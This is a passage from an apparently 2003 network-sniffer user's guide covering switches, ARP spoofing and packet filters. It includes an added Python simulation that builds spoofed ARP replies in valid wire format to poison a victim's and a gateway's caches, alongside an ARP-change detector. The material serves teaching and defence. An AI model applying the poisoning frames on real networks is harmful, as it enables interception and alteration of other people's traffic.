User's guide

(C) 2003 Airscanner Corp. http://www.airscanner.com
A switch, on the other hand, is an active device. It records the MAC address of each
network card connected to it and builds an internal table that maps MAC addresses to switch
ports, which it uses to control traffic flow. In other words, a switch examines the header of each
frame for the destination MAC address. Once a match is found in the table, the switch passes the
frame only to the port associated with that MAC address. Note that it passes data only to the port
that matches the MAC/port table, which means a sniffer connected to another port on the switch
will NOT have access to that data; at least, not without some network manipulation.
In the case of a wireless network, you could be dealing with several networking
environments at once. The wireless part of the network behaves like a hub: data is sent out over
the airwaves, and there is no way to control who or what can receive it.
2.3 ARP Spoofing
As we have previously discussed, the existence of a switch in a network is a serious obstacle
to a sniffer. Because of the switch's MAC/port table, traffic addressed to one NIC is passed only
to the port where that NIC is connected. However, it is possible to manipulate the network to
gain access to traffic passing on other ports. This is accomplished using a method known as ARP
spoofing.
The Address Resolution Protocol (ARP) is used by network devices to establish the
relationship between IP addresses and MAC addresses. This reduces the complexity of
maintaining a network: hosts are addressed by IP, and the mapping to hardware addresses is
automated. To speed up the conversion, most network devices keep an ARP table (the ARP
cache) that temporarily stores recently resolved IP addresses and their corresponding MAC
addresses. Once a cache entry exists for a device, further transmissions to it do not need another
ARP request to determine the target's MAC address.
While the ARP table speeds up data transmission, it also creates a huge hole that a sniffer
can exploit: many hosts accept an ARP reply they never asked for and overwrite the cache entry
for that IP address. In short, an ARP table can be manipulated by sending spoofed ARP replies to
the communicating network devices. With this network trick, the hacker places his or her
computer in the middle of an existing data path by creating false ARP entries in both the target's
computer and the gateway device (or whatever computer the target is communicating with). The
target is told that the gateway's IP address belongs to the hacker's MAC address, and the gateway
is told the same about the target. Once the hacker is in the middle, he can easily capture, record,
or even change the data passing between the two network devices.
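The following is an added example written for this edition of the guide; it is not Airscanner code. It models both the switch behaviour described earlier (a learning MAC/port table that only floods frames for unknown destinations) and the ARP spoofing just described: it builds the two spoofed ARP replies in real RFC 826 wire format, delivers them through the model switch to hosts whose ARP caches accept any reply, and runs a simple watcher on a mirror port that alerts when the MAC claimed for an IP address changes. All MAC and IP addresses, port numbers and names (poison_pair, NaiveArpCache, ArpWatch) are constructed for the example.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

ATTACKER_MAC = "00:0c:29:aa:bb:cc"   # constructed sample addresses
VICTIM_MAC = "00:1a:2b:3c:4d:5e"
VICTIM_IP = "192.168.1.10"
GW_MAC = "00:50:56:01:02:03"
GW_IP = "192.168.1.1"


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP reply in RFC 826 layout (42 bytes)."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # hardware type Ethernet, protocol IPv4, address lengths 6/4, opcode reply
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip, target_mac, target_ip), or None if not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    if struct.unpack("!HHBB", frame[14:20]) != (1, 0x0800, 6, 4):
        return None
    op = struct.unpack("!H", frame[20:22])[0]
    return (op, mac_str(frame[22:28]), ip_str(frame[28:32]),
            mac_str(frame[32:38]), ip_str(frame[38:42]))


class Switch:
    """Learning switch: source MAC -> port; frames for unknown destinations are flooded."""
    def __init__(self):
        self.mac_to_port = {}

    def forward(self, frame, in_port, port_count):
        self.mac_to_port[mac_str(frame[6:12])] = in_port
        dst = mac_str(frame[0:6])
        if dst in self.mac_to_port:
            return [self.mac_to_port[dst]]
        return [p for p in range(port_count) if p != in_port]


class NaiveArpCache:
    """Models the hole described in the text: any ARP reply overwrites the cache entry."""
    def __init__(self):
        self.table = {}

    def process(self, frame):
        p = parse_arp(frame)
        if p and p[0] == ARP_REPLY:
            self.table[p[2]] = p[1]


class ArpWatch:
    """Detector on a mirror port: alert when the MAC claimed for an IP address changes."""
    def __init__(self):
        self.seen, self.alerts = {}, []

    def process(self, frame):
        p = parse_arp(frame)
        if p is None:
            return
        old = self.seen.setdefault(p[2], p[1])
        if old != p[1]:
            self.alerts.append(f"{p[2]} moved from {old} to {p[1]}")


def poison_pair(attacker_mac, victim_mac, victim_ip, gw_mac, gw_ip):
    """The two spoofed replies that put the attacker between victim and gateway."""
    to_victim = build_arp_reply(attacker_mac, gw_ip, victim_mac, victim_ip)
    to_gateway = build_arp_reply(attacker_mac, victim_ip, gw_mac, gw_ip)
    return to_victim, to_gateway


def demo():
    # port 0: victim, port 1: gateway, port 2: the attacker's sniffer
    switch, watch = Switch(), ArpWatch()
    caches = {0: NaiveArpCache(), 1: NaiveArpCache()}
    sniffer_saw = 0
    legit = [(0, build_arp_reply(VICTIM_MAC, VICTIM_IP, GW_MAC, GW_IP)),
             (1, build_arp_reply(GW_MAC, GW_IP, VICTIM_MAC, VICTIM_IP))]
    to_victim, to_gateway = poison_pair(ATTACKER_MAC, VICTIM_MAC, VICTIM_IP, GW_MAC, GW_IP)
    for in_port, frame in legit + [(2, to_victim), (2, to_gateway)]:
        watch.process(frame)                      # mirror port sees every frame
        for out in switch.forward(frame, in_port, 3):
            if out == 2:
                sniffer_saw += 1                  # only flooded frames reach port 2
            else:
                caches[out].process(frame)
    return {"victim_sees_gateway_as": caches[0].table[GW_IP],
            "gateway_sees_victim_as": caches[1].table[VICTIM_IP],
            "sniffer_saw": sniffer_saw, "alerts": watch.alerts}
```

Running demo() shows the two sides of the section: before poisoning, the sniffer on port 2 receives only the single frame the switch flooded while it had not yet learned the gateway's port, and nothing of the later unicast exchange; after the two spoofed replies, both the victim's and the gateway's caches map the other side's IP to the attacker's MAC, so all traffic between them is now switched to port 2. The ArpWatch class is the check a defender wants: two alerts, one per overwritten binding.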
2.4 Filters
A good sniffer is more than just a packet collection device or program. At its most basic, a
sniffer simply gathers data and stores it in a file, which can grow to several gigabytes in only a
few minutes on a busy network, or in hours on a slower one. While this raw data is exactly what
a troubleshooter wants, it can quickly become overwhelming and swamp the user with irrelevant
information. In other words, finding that one desired piece of information can be much like
finding a needle in a haystack.